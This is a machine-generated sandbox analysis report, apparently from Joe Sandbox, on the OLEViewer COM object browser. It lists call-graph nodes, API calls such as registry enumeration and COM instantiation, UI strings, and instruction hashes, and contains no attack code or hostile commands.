15895->15906 15896->15761 15907 d3a7c6 15897->15907 15898->15861 15908 d3afd6 RegOpenKeyExW 15899->15908 15909 d3b04b RegQueryValueW 15899->15909 15902 d39419 6 API calls 15900->15902 15912 d3a555 #800 15901->15912 15913 d3a56c 15901->15913 15902->15901 15903->15904 15904->15814 15914 d3b2de #538 15904->15914 15905->15878 15915 d3de06 2 API calls 15906->15915 15916 d3a7dc #538 #538 15907->15916 15932 d3a836 15907->15932 15917 d3affb #538 15908->15917 15918 d3b03f RegCloseKey 15908->15918 15910 d3b105 RegCloseKey 15909->15910 15911 d3b078 lstrcmpiW 15909->15911 15910->15898 15911->15910 15919 d3b090 RegOpenKeyExW 15911->15919 15912->15913 15920 d3a578 #800 15913->15920 15921 d3a58f SendMessageW 15913->15921 15922 d39634 30 API calls 15914->15922 15923 d3a9c9 15915->15923 15924 d39419 6 API calls 15916->15924 15925 d39634 30 API calls 15917->15925 15918->15909 15926 d3b0b5 #538 15919->15926 15927 d3b0f9 RegCloseKey 15919->15927 15920->15921 15929 d3d67d 9 API calls 15921->15929 15928 d3b30e #800 RegCloseKey 15922->15928 15930 d3aa39 15923->15930 15931 d3a9df #538 #537 15923->15931 15924->15932 15933 d3b030 #800 15925->15933 15938 d39634 30 API calls 15926->15938 15927->15910 15928->15814 15939 d3a5e3 #538 15929->15939 15944 d3aa4b #800 15930->15944 15945 d3aa5c 15930->15945 15940 d39419 6 API calls 15931->15940 15934 d3a859 15932->15934 15935 d3a848 #800 15932->15935 15933->15918 15936 d3a876 SendMessageW #538 15934->15936 15937 d3a865 #800 15934->15937 15935->15934 15941 d39634 30 API calls 15936->15941 15937->15936 15942 d3b0ea #800 15938->15942 15943 d39634 30 API calls 15939->15943 15940->15930 15948 d3a8c2 #800 SendMessageW RegCloseKey 15941->15948 15942->15927 15949 d3a615 #800 SendMessageW RegCloseKey 15943->15949 15944->15945 15946 d3aa73 SendMessageW #538 15945->15946 15947 d3aa68 #800 15945->15947 15950 d39634 30 API calls 15946->15950 15947->15946 15948->15886 15949->15872 15951 d3aabf #800 SendMessageW RegCloseKey 15950->15951 15951->15896 15953 d2e493 #6211 SendMessageW SendMessageW 15952->15953 15954 d2dc98 15952->15954 15955 d2e583 6 API calls 15953->15955 15954->15686 15956 d2e4cc 15955->15956 15957 d2e4e0 SendMessageW 15956->15957 15958 d2e4f8 SendMessageW 15957->15958 15959 d2e4ce SendMessageW 15957->15959 15960 d2e52e SendMessageW 15958->15960 15961 d2e50e SendMessageW 15958->15961 15959->15957 15962 d2e583 6 API calls 15960->15962 15961->15960 15963 d2e54b SendMessageW RedrawWindow RedrawWindow 15962->15963 15963->15954 16091 d2c6f3 SendMessageW 15964->16091 16140 d30bbb SendMessageW 15967->16140 16150 d3f415 15970->16150 15972 d2cb25 #540 StringFromGUID2 15973 d3d605 12 API calls 15972->15973 15974 d2cb98 15973->15974 15975 d3d605 12 API calls 15974->15975 15976 d2cbd6 #861 15975->15976 15978 d3d605 12 API calls 15976->15978 15979 d2cc2d 15978->15979 15980 d2cc31 lstrcmpW 15979->15980 15981 d2cc79 #2634 #6195 15979->15981 15982 d2cc62 #6195 #2634 15980->15982 15983 d2cc49 #6195 #2634 15980->15983 15984 d2cc8e 15981->15984 15982->15984 15985 d2cc92 SendMessageW #6330 #800 15983->15985 15984->15985 15986 d3f3c4 4 API calls 15985->15986 15987 d2ccc1 15986->15987 15988 d2e1a4 15987->15988 15989 d3d4cd 5 API calls 15988->15989 15990 d2e1b4 15989->15990 15991 d2e1cd SendMessageW SendMessageW 15990->15991 15992 d2e1c1 15990->15992 15993 d3db15 3 API calls 15991->15993 15994 d2e466 18 API calls 15992->15994 15995 d2e204 15993->15995 15996 d2df80 wsprintfW RegOpenKeyExW 15994->15996 15997 d2e228 15995->15997 15998 d2e210 SendMessageW 15995->15998 15996->15686 15996->15729 15999 d3db15 3 API calls 15997->15999 15998->15996 15998->15997 16000 d2e22d 15999->16000 16001 d2e251 #6211 SendMessageW SendMessageW 16000->16001 16002 d2e239 SendMessageW 16000->16002 16003 d2e281 SendMessageW 16001->16003 16004 d2e2b4 SendMessageW 16001->16004 16002->15996 16002->16001 16003->16004 16005 d2e298 SendMessageW 16003->16005 16006 d2e2c7 SendMessageW 16004->16006 16007 d2e2e4 16004->16007 16008 d2e583 6 API calls 16005->16008 16006->16007 16009 d3db15 3 API calls 16007->16009 16008->16004 16010 d2e2e9 16009->16010 16011 d2e391 16010->16011 16013 d3d4cd 5 API calls 16010->16013 16012 d2e396 SendMessageW SendMessageW SendMessageW 16011->16012 16014 d2e583 6 API calls 16012->16014 16015 d2e2f6 16013->16015 16016 d2e3e0 SendMessageW RedrawWindow 16014->16016 16017 d2e2ff SendMessageW SendMessageW 16015->16017 16018 d2e32c 16015->16018 16016->15996 16017->16018 16019 d3d4cd 5 API calls 16018->16019 16020 d2e331 16019->16020 16021 d2e362 SendMessageW SendMessageW 16020->16021 16022 d2e335 SendMessageW SendMessageW 16020->16022 16021->16012 16022->16021 16024 d2d983 lstrlenW 16023->16024 16025 d2d9fb 16023->16025 16027 d2d99b 16024->16027 16026 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 16025->16026 16030 d2da08 16026->16030 16028 d2d9b3 lstrcpyW wcsrchr 16027->16028 16029 d2d9e0 #1165 ExtractIconW 16027->16029 16028->16029 16031 d2d9db 16028->16031 16029->16025 16030->15734 16030->15737 16031->16029 16033 d2e648 #6211 16032->16033 16034 d2e599 16032->16034 16037 d2e444 SendMessageW #6211 16033->16037 16040 d2e5cd RedrawWindow 16033->16040 16035 d2e5a2 16034->16035 16036 d2e625 #6211 16034->16036 16038 d2e602 #6211 16035->16038 16039 d2e5a7 16035->16039 16036->16037 16036->16040 16037->15749 16038->16037 16038->16040 16042 d2e5df #6211 16039->16042 16043 d2e5ac 16039->16043 16040->16037 16042->16037 16042->16040 16043->16037 16044 d2e5b5 #6211 16043->16044 16044->16037 16044->16040 16046 d39b4f #1662 SendMessageW 16045->16046 16047 d3559e SendMessageW 16046->16047 16047->15757 16084 d3f3e2 16048->16084 16050 d39643 RegQueryInfoKeyW 16051 d39678 16050->16051 16069 d396b8 16050->16069 16052 d39758 RegEnumValueW 16051->16052 16051->16069 16067 d397ad 16052->16067 16053 d39946 lstrcpyW 16053->16067 16054 d398fc lstrcpyW 16054->16067 16055 d3de06 2 API calls 16055->16067 16056 d3987a memset 16056->16067 16057 d39979 #538 #538 16085 d393af 16057->16085 16058 d39862 wsprintfW 16058->16067 16060 d39930 wsprintfW 16060->16067 16061 d39843 wsprintfW 16061->16067 16062 d399cd #800 16062->16067 16063 d399e6 #800 16063->16067 16064 d39922 wsprintfW 16064->16067 16065 d398c2 _itow 16065->16067 16066 d399fa SendMessageW RegEnumValueW 16066->16067 16067->16053 16067->16054 16067->16055 16067->16056 16067->16057 16067->16058 16067->16060 16067->16061 16067->16062 16067->16063 16067->16064 16067->16065 16067->16066 16072 d39a57 16067->16072 16068 d39b15 RegEnumKeyW 16068->16069 16070 d39aa6 RegOpenKeyExW 16068->16070 16069->15767 16071 d39abe #538 16070->16071 16070->16072 16073 d39634 8 API calls 16071->16073 16072->16068 16072->16069 16074 d39ae0 #800 SendMessageW RegCloseKey 16073->16074 16074->16072 16090 d3f3e2 16075->16090 16077 d39425 6 API calls 16078 d39482 16077->16078 16078->15774 16080 d3d67d 9 API calls 16079->16080 16081 d3d0a1 16080->16081 16082 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 16081->16082 16083 d3a466 16082->16083 16083->15860 16083->15865 16084->16050 16089 d3f3e2 16085->16089 16087 d393bb 6 API calls 16088 d39416 16087->16088 16088->16067 16089->16087 16090->16077 16092 d3d2f7 12 API calls 16091->16092 16093 d2c745 16092->16093 16101 d3c0bc 16093->16101 16096 d2c7a5 SendMessageW SendMessageW 16098 d2c7c1 #2634 #2634 16096->16098 16097 d2c78a SendMessageW SendMessageW 16097->16098 16099 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 16098->16099 16100 d2c6d9 LoadCursorW SetCursor 16099->16100 16100->15720 16139 d3f415 16101->16139 16103 d3c0cb #540 RegOpenKeyExW 16104 d3c157 16103->16104 16105 d3c11e RegQueryValueExW 16103->16105 16108 d3c159 #800 16104->16108 16106 d3c146 16105->16106 16107 d3c16e malloc 16105->16107 16106->16107 16109 d3c14b RegCloseKey 16106->16109 16111 d3c187 RegCloseKey 16107->16111 16112 d3c198 RegQueryValueExW RegCloseKey 16107->16112 16110 d3f3c4 4 API calls 16108->16110 16109->16104 16113 d2c76e 16110->16113 16111->16104 16114 d3c1d6 GetSecurityDescriptorDacl 16112->16114 16115 d3c1cc free 16112->16115 16113->16096 16113->16097 16116 d3c203 16114->16116 16117 d3c1f6 GetLastError 16114->16117 16115->16104 16118 d3c210 #2810 SendMessageW 16116->16118 16119 d3c2dd GetAce 16116->16119 16117->16104 16120 d3c2d0 free 16118->16120 16121 d3c25b SendMessageW SendMessageW SendMessageW 16118->16121 16122 d3c2f9 16119->16122 16123 d3c5ac GetLastError 16119->16123 16120->16108 16121->16120 16124 d3c31c LookupAccountSidW 16122->16124 16127 d3c571 #3993 16122->16127 16128 d3c449 LookupAccountSidW 16122->16128 16125 d3c35a #2810 16124->16125 16126 d3c37e #2810 16124->16126 16130 d3c391 SendMessageW 16125->16130 16126->16130 16129 d3c584 GetAce 16127->16129 16131 d3c487 #2810 16128->16131 16132 d3c4ab #2810 16128->16132 16129->16122 16134 d3c5a6 16129->16134 16130->16129 16135 d3c3cd SendMessageW SendMessageW 16130->16135 16133 d3c4be SendMessageW 16131->16133 16132->16133 16133->16129 16136 d3c4fa SendMessageW SendMessageW 16133->16136 16134->16123 16137 d3c559 SendMessageW 16135->16137 16138 d3c43c 16135->16138 16136->16138 16137->16129 16138->16137 16139->16103 16141 d3d2f7 12 API calls 16140->16141 16142 d30c07 16141->16142 16143 d3c0bc 39 API calls 16142->16143 16144 d30c2a 16143->16144 16145 d30c5f SendMessageW SendMessageW UpdateWindow #2634 #2634 16144->16145 16146 d30c2e #2634 SendMessageW SendMessageW 16144->16146 16147 d30ca8 16145->16147 16146->16147 16148 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 16147->16148 16149 d30b99 #6330 LoadCursorW SetCursor 16148->16149 16149->15722 16150->15972 16151 d2fc60 16153 d2fc7d #4435 16151->16153 16154 d316c0 #2244 16155 d31775 16154->16155 16156 d316ee 16154->16156 16156->16155 16157 d3173e #3476 #3476 #5848 #5906 16156->16157 16157->16155 16158 d30cc0 #4704 SendMessageW SendMessageW #2634 #2634 16159 d316a0 #4146 16160 d33a60 16161 d33a96 16160->16161 16162 d33ac5 16160->16162 16161->16162 16163 d33aca #1662 16161->16163 16164 d33adc 16163->16164 16188 d2e18b SendMessageW 16164->16188 16166 d33ae3 16167 d33b01 16166->16167 16168 d33af1 16166->16168 16170 d33b0f 16167->16170 16171 d33b1c 16167->16171 16190 d3693c 16168->16190 16207 d35601 RegOpenKeyW 16170->16207 16173 d33b37 16171->16173 16174 d33b2a 16171->16174 16176 d33b52 16173->16176 16177 d33b45 16173->16177 16225 d373b0 RegOpenKeyW 16174->16225 16180 d33b87 16176->16180 16181 d33b58 16176->16181 16179 d3642d 57 API calls 16177->16179 16178 d33b50 16189 d2e18b SendMessageW 16178->16189 16179->16178 16289 d3591d 16180->16289 16181->16180 16182 d33b61 16181->16182 16251 d36c29 16182->16251 16186 d33ba3 #2644 16186->16162 16187 d33afc 16187->16178 16188->16166 16189->16186 16191 d36c10 16190->16191 16192 d3698b RegOpenKeyW 16190->16192 16193 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 16191->16193 16192->16191 16202 d369ee 16192->16202 16195 d36c25 16193->16195 16194 d36a04 RegEnumKeyW 16196 d36a27 RegQueryValueW 16194->16196 16197 d36c04 RegCloseKey 16194->16197 16195->16187 16198 d36bff 16196->16198 16196->16202 16197->16191 16198->16197 16199 d36a6c wsprintfW 16199->16202 16200 d2b3d0 2 API calls 16200->16202 16201 d33e89 2 API calls 16201->16202 16202->16194 16202->16199 16202->16200 16202->16201 16203 d36ae9 16202->16203 16204 d36b11 CLSIDFromString 16203->16204 16205 d36b29 16203->16205 16204->16205 16345 d37f0b SendMessageW 16205->16345 16208 d35904 16207->16208 16218 d35661 16207->16218 16210 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 16208->16210 16209 d35681 RegEnumKeyW 16211 d358f8 RegCloseKey 16209->16211 16209->16218 16212 d35919 16210->16212 16211->16208 16212->16187 16213 d358f3 16213->16211 16214 d2b3d0 2 API calls 16214->16218 16215 d33e89 2 API calls 16215->16218 16216 d35737 wsprintfW RegQueryValueW 16217 d357b0 16216->16217 16219 d357bf CLSIDFromString 16217->16219 16224 d357d7 16217->16224 16218->16209 16218->16213 16218->16214 16218->16215 16218->16216 16220 d35837 lstrcpyW lstrlenW 16219->16220 16221 d358b2 wsprintfW 16220->16221 16222 d358ce 16220->16222 16221->16222 16346 d37f0b SendMessageW 16222->16346 16224->16220 16226 d37410 RegEnumKeyW 16225->16226 16227 d3775a 16225->16227 16231 d37449 RegOpenKeyW 16226->16231 16232 d3774e RegCloseKey 16226->16232 16228 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 16227->16228 16230 d3776f 16228->16230 16230->16187 16233 d37749 16231->16233 16239 d3746b 16231->16239 16232->16227 16233->16232 16234 d37481 RegEnumKeyW 16235 d374a4 RegQueryValueW 16234->16235 16236 d3773d RegCloseKey 16234->16236 16237 d37738 16235->16237 16235->16239 16236->16233 16237->16236 16238 d2b3d0 2 API calls 16238->16239 16239->16234 16239->16238 16240 d33e89 2 API calls 16239->16240 16241 d37538 16239->16241 16240->16239 16242 d37560 CLSIDFromString 16241->16242 16248 d37578 16241->16248 16243 d375d8 wcstol wcsrchr 16242->16243 16244 d37643 wcstol 16243->16244 16245 d37665 16243->16245 16244->16245 16246 d37683 wsprintfW 16245->16246 16247 d3769f wsprintfW 16245->16247 16246->16247 16249 d37731 16247->16249 16248->16243 16347 d37f0b SendMessageW 16249->16347 16252 d36c90 16251->16252 16253 d36cb2 16251->16253 16254 d36cbd 16252->16254 16255 d36c9c 16252->16255 16263 d36d47 16253->16263 16368 d378fa SendMessageW 16253->16368 16257 d34899 33 API calls 16254->16257 16348 d35010 16255->16348 16259 d36cdc 16257->16259 16259->16253 16261 d36ceb #540 16259->16261 16260 d36d7d 16369 d39230 SendMessageW 16260->16369 16367 d2b3f4 16261->16367 16267 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 16263->16267 16264 d36d08 #2810 16266 d3d91d 17 API calls 16264->16266 16270 d36d2f #800 16266->16270 16268 d373ac 16267->16268 16268->16187 16269 d36db9 RegOpenKeyW 16269->16263 16272 d36e2d malloc 16269->16272 16270->16253 16275 d36e8d 16272->16275 16276 d36e99 16272->16276 16273 d37351 RegCloseKey 16273->16263 16274 d36eb8 malloc 16274->16275 16274->16276 16275->16273 16278 d37344 free 16275->16278 16279 d37328 free 16275->16279 16276->16274 16287 d36ef2 16276->16287 16278->16273 16279->16275 16280 d36f23 RegEnumKeyW 16280->16287 16281 d36f5d CLSIDFromString 16281->16287 16282 d3712c StringFromGUID2 16282->16287 16283 d3716e lstrcpyW RegQueryValueW 16283->16287 16284 d371c6 wsprintfW 16284->16287 16285 d2b3d0 2 API calls 16285->16287 16286 d33e89 2 API calls 16286->16287 16287->16275 16287->16280 16287->16281 16287->16282 16287->16283 16287->16284 16287->16285 16287->16286 16370 d37f0b SendMessageW 16287->16370 16290 d35f52 RegOpenKeyW 16289->16290 16291 d359a8 16289->16291 16301 d35f71 16290->16301 16310 d3637d 16290->16310 16291->16290 16292 d359c4 StringFromGUID2 16291->16292 16371 d2b696 16292->16371 16293 d35f87 RegEnumKeyW 16295 d36371 RegCloseKey 16293->16295 16293->16301 16295->16310 16296 d359e3 lstrcpyW CoCreateInstance 16297 d35f10 #538 16296->16297 16308 d35a26 16296->16308 16303 d3d91d 17 API calls 16297->16303 16298 d35fba wsprintfW RegOpenKeyW 16300 d36000 RegCloseKey 16298->16300 16298->16301 16299 d3600c 16302 d2b3d0 2 API calls 16299->16302 16300->16299 16301->16293 16301->16298 16301->16299 16304 d36016 16302->16304 16305 d35f39 #800 16303->16305 16306 d36037 16304->16306 16307 d33e89 2 API calls 16304->16307 16305->16290 16309 d37a11 41 API calls 16306->16309 16307->16306 16311 d35e13 #538 16308->16311 16320 d35ae3 16308->16320 16318 d36074 16309->16318 16317 d35edf 16310->16317 16375 d391ad ResumeThread 16310->16375 16312 d3d91d 17 API calls 16311->16312 16313 d35e3c #800 16312->16313 16335 d35e11 16313->16335 16315 d36303 16315->16295 16316 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 16319 d36429 16316->16319 16317->16316 16318->16315 16321 d361d0 16318->16321 16323 d3f604 4 API calls 16318->16323 16319->16178 16324 d2b3d0 2 API calls 16320->16324 16329 d33e89 2 API calls 16320->16329 16330 d35b69 StringFromGUID2 16320->16330 16331 d37a11 41 API calls 16320->16331 16333 d35bf4 #537 16320->16333 16334 d3f604 4 API calls 16320->16334 16320->16335 16337 d35c45 #925 16320->16337 16339 d35c99 RegQueryValueW 16320->16339 16340 d35cec #800 16320->16340 16341 d35d0d #800 16320->16341 16342 d35d2a wsprintfW 16320->16342 16344 d35dd4 #1083 16320->16344 16372 d37f0b SendMessageW 16320->16372 16322 d361d7 RegQueryValueW 16321->16322 16325 d3623a 16322->16325 16326 d3620c 16322->16326 16323->16322 16324->16320 16374 d37f0b SendMessageW 16325->16374 16326->16325 16327 d3621e wsprintfW 16326->16327 16327->16325 16329->16320 16330->16320 16331->16320 16332 d36292 16332->16315 16336 d362d7 #1083 16332->16336 16333->16320 16334->16333 16335->16317 16373 d391ad ResumeThread 16335->16373 16336->16315 16337->16320 16339->16320 16340->16320 16341->16320 16342->16320 16344->16320 16345->16198 16346->16213 16347->16237 16349 d39137 CoFreeUnusedLibraries 16348->16349 16350 d35049 #540 16349->16350 16351 d35067 CoGetClassObject 16350->16351 16352 d35088 CoGetClassObject 16350->16352 16353 d350a6 16351->16353 16352->16353 16354 d350c1 16353->16354 16355 d350ac #860 #1262 16353->16355 16356 d350c7 #860 #1262 16354->16356 16357 d350dc 16354->16357 16355->16354 16356->16357 16358 d35110 #860 #1262 16357->16358 16359 d35125 16357->16359 16358->16359 16360 d3512e #860 #1262 16359->16360 16361 d35143 16359->16361 16360->16361 16362 d351b3 16361->16362 16363 d3519e #860 #1262 16361->16363 16364 d351bc #860 #1262 16362->16364 16365 d351d1 #800 16362->16365 16363->16362 16364->16365 16365->16253 16367->16264 16368->16260 16369->16269 16370->16287 16371->16296 16372->16320 16373->16317 16374->16332 16375->16317 16376 d30d60 16377 d30d6c __EH_prolog3 16376->16377 16378 d3de06 2 API calls 16377->16378 16379 d30d76 16378->16379 16380 d30d8a 16379->16380 16382 d31536 16379->16382 16387 d3f3e2 16382->16387 16384 d31542 #366 #527 #529 #554 16388 d315a4 #439 16384->16388 16386 d3158e 16386->16380 16387->16384 16388->16386

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D2B90F
                                                                          • #540.MFC42U(000005AC,00D2B566,00000000,00000011), ref: 00D2B91D
                                                                          • #4155.MFC42U(00000004,000005AC,00D2B566,00000000,00000011), ref: 00D2B92F
                                                                          • StringFromGUID2.OLE32(00D236E4,?), ref: 00D2B949
                                                                          • wsprintfW.USER32 ref: 00D2B95F
                                                                          • RegQueryValueW.ADVAPI32(80000000,?,?,?), ref: 00D2B982
                                                                          • #540.MFC42U ref: 00D2B998
                                                                          • #540.MFC42U ref: 00D2B9A7
                                                                          • #538.MFC42U(Comcat.DLL), ref: 00D2B9BB
                                                                          • LoadLibraryW.KERNEL32(?,Comcat.DLL), ref: 00D2BAAE
                                                                          • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00D2BAC5
                                                                          • #4155.MFC42U(00000019), ref: 00D2BB0C
                                                                          • #4155.MFC42U(00000018,00000019), ref: 00D2BB19
                                                                          • #940.MFC42U(?,00000018,00000019), ref: 00D2BB2B
                                                                          • #1197.MFC42U(?,00000000,00000000,?,00000018,00000019), ref: 00D2BB38
                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000000,?,00000018,00000019), ref: 00D2BB3E
                                                                          • #6398.MFC42U(?,Version,0000003D,00000001,comcat.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,0000001A,?,00000018), ref: 00D2BB5B
                                                                          • #800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 00D2BB66
                                                                          • #800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 00D2BB71
                                                                          • #800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 00D2BB7C
                                                                          • #800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 00D2BB87
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #800$#4155#540$Library$#1197#538#6398#940AddressFreeFromH_prolog3_LoadProcQueryStringValuewsprintf
                                                                          • String ID: CLSID\%s$Comcat.DLL$DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|$DllRegisterServer$Version$comcat.dll
                                                                          • API String ID: 446370969-4202070818
                                                                          • Opcode ID: f031a316bd0b64db242ef5382631820888faa2daeda8f2accd23842156877de5
                                                                          • Instruction ID: d851c3cce2af77ac48ce0f5ed81efca1770fd01a896a95c35f52a2e0404d3167
                                                                          • Opcode Fuzzy Hash: f031a316bd0b64db242ef5382631820888faa2daeda8f2accd23842156877de5
                                                                          • Instruction Fuzzy Hash: A8516131A416289ECB25EB50DC92BEEBB35EF25305F4041A9B185B61D1DFB05F88CE32

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D2B4F7
                                                                            • Part of subcall function 00D2B463: GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 00D2B468
                                                                            • Part of subcall function 00D2B463: GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00D2B479
                                                                          • GetVersionExW.KERNEL32(00D437B0,00000004), ref: 00D2B512
                                                                            • Part of subcall function 00D3BD2A: LoadLibraryW.KERNELBASE(ACLUI.DLL,00D2B51D), ref: 00D3BD38
                                                                            • Part of subcall function 00D3BD2A: MessageBoxW.USER32(00000000,Couldn't get address of EditSecurity ACLUI.DLL!,OLEViewer,00000000), ref: 00D3BD50
                                                                            • Part of subcall function 00D3BD2A: exit.MSVCRT ref: 00D3BD58
                                                                            • Part of subcall function 00D3BD2A: GetProcAddress.KERNEL32(00000000,EditSecurity), ref: 00D3BD64
                                                                          • #1202.MFC42U ref: 00D2B51D
                                                                          • #538.MFC42U(OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.), ref: 00D2B530
                                                                            • Part of subcall function 00D3D91D: __EH_prolog3.LIBCMT ref: 00D3D924
                                                                            • Part of subcall function 00D3D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00D3B9B7,?,00000000,00000000,00000000), ref: 00D3D942
                                                                            • Part of subcall function 00D3D91D: #540.MFC42U ref: 00D3D94F
                                                                            • Part of subcall function 00D3D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 00D3D96C
                                                                            • Part of subcall function 00D3D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 00D3D97F
                                                                            • Part of subcall function 00D3D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D98C
                                                                            • Part of subcall function 00D3D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D997
                                                                            • Part of subcall function 00D3D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00D3D99F
                                                                            • Part of subcall function 00D3D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00D3D9AA
                                                                            • Part of subcall function 00D3D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00D3DA13
                                                                          • #800.MFC42U(?,00000000,OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.), ref: 00D2B546
                                                                          • #6112.MFC42U(00000011), ref: 00D2B556
                                                                          • #2613.MFC42U(00000000,00000011), ref: 00D2B571
                                                                          • #384.MFC42U(00000000,00000011), ref: 00D2B590
                                                                          • #2089.MFC42U(000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00D2B5B2
                                                                          • #1197.MFC42U(Could not load bitmaps,00000000,00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00D2B5C2
                                                                          • #520.MFC42U(00000002,00D23458,00D240EC,00D24A54,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00D2B5EE
                                                                          • #986.MFC42U(00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00D2B5FE
                                                                          • #4604.MFC42U(00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00D2B60B
                                                                          • #1197.MFC42U(Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.,00000000,00000000,00000000,00000000,00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00D2B640
                                                                          • #5977.MFC42U ref: 00D2B688
                                                                          Strings
                                                                          • Could not load bitmaps, xrefs: 00D2B5BD
                                                                          • OleInitialize failed. Could not initialized OLE; OLEViewer cannot run., xrefs: 00D2B528
                                                                          • Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator., xrefs: 00D2B63B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #1197#800$AddressH_prolog3MessageProc$#1202#2089#2613#2810#384#4604#520#538#540#5977#6112#858#922#986FormatFreeHandleLibraryLoadLocalModuleVersionexit
                                                                          • String ID: Could not load bitmaps$OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.$Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.
                                                                          • API String ID: 800470354-1540245615
                                                                          • Opcode ID: 42ac3700c9550feb3dccdffdd9d00b03850081cd9c82d25cb1e9b2ef82b7fea8
                                                                          • Instruction ID: 5c4e6d2467ccd9b3faa20ccb110635239aacd30e24c6b2a0fc3efd20e79f327a
                                                                          • Opcode Fuzzy Hash: 42ac3700c9550feb3dccdffdd9d00b03850081cd9c82d25cb1e9b2ef82b7fea8
                                                                          • Instruction Fuzzy Hash: 8841C370B003259BDB14BBB4AC56A3E77A5EF65328F14442AF552EB3D2DFB48D009A30

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 402 d3642d-d364d6 CoCreateInstance 403 d36738-d36758 RegOpenKeyW 402->403 404 d364dc-d36527 GetUserDefaultLCID 402->404 405 d36923-d36939 call d3f3a0 403->405 406 d3675e-d36791 RegEnumKeyW 403->406 416 d3670a-d36733 404->416 417 d3652d-d36535 404->417 411 d36917-d3691d RegCloseKey 406->411 412 d36797-d367b3 RegOpenKeyW 406->412 411->405 413 d36912 412->413 414 d367b9-d367e8 RegQueryValueExW 412->414 418 d36906-d3690c RegCloseKey 414->418 419 d367ee-d367fe 414->419 416->405 420 d3653d-d36573 417->420 418->413 421 d36800-d36819 wsprintfW 419->421 422 d3681c-d3683a call d2b3d0 419->422 434 d366e1-d36704 420->434 435 d36579-d3659f StringFromGUID2 420->435 421->422 427 d3684f 422->427 428 d3683c-d3684d call d33e89 422->428 432 d36856-d36893 call d37a11 427->432 428->432 442 d368a2-d36901 call d379ae call d37f0b 432->442 443 d36895-d3689b 432->443 434->416 437 d365a1-d365b3 call d2b696 435->437 438 d365b5-d365d7 wsprintfW 435->438 444 d365dd-d365f0 437->444 438->444 442->418 443->442 447 d36603-d3661e call d2b3d0 444->447 448 d365f2-d365fc 444->448 454 d36633 447->454 455 d36620-d36631 call d33e89 447->455 448->447 450 d365fe 448->450 450->420 457 d3663a-d36669 call d2b696 call d37a11 454->457 455->457 462 d3666e-d36670 457->462 463 d36672-d36678 462->463 464 d3667f-d366dc call d379ae call d37f0b 462->464 463->464 464->420
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00D236E4,00000000,00000001,00D236F4,00000000), ref: 00D364C3
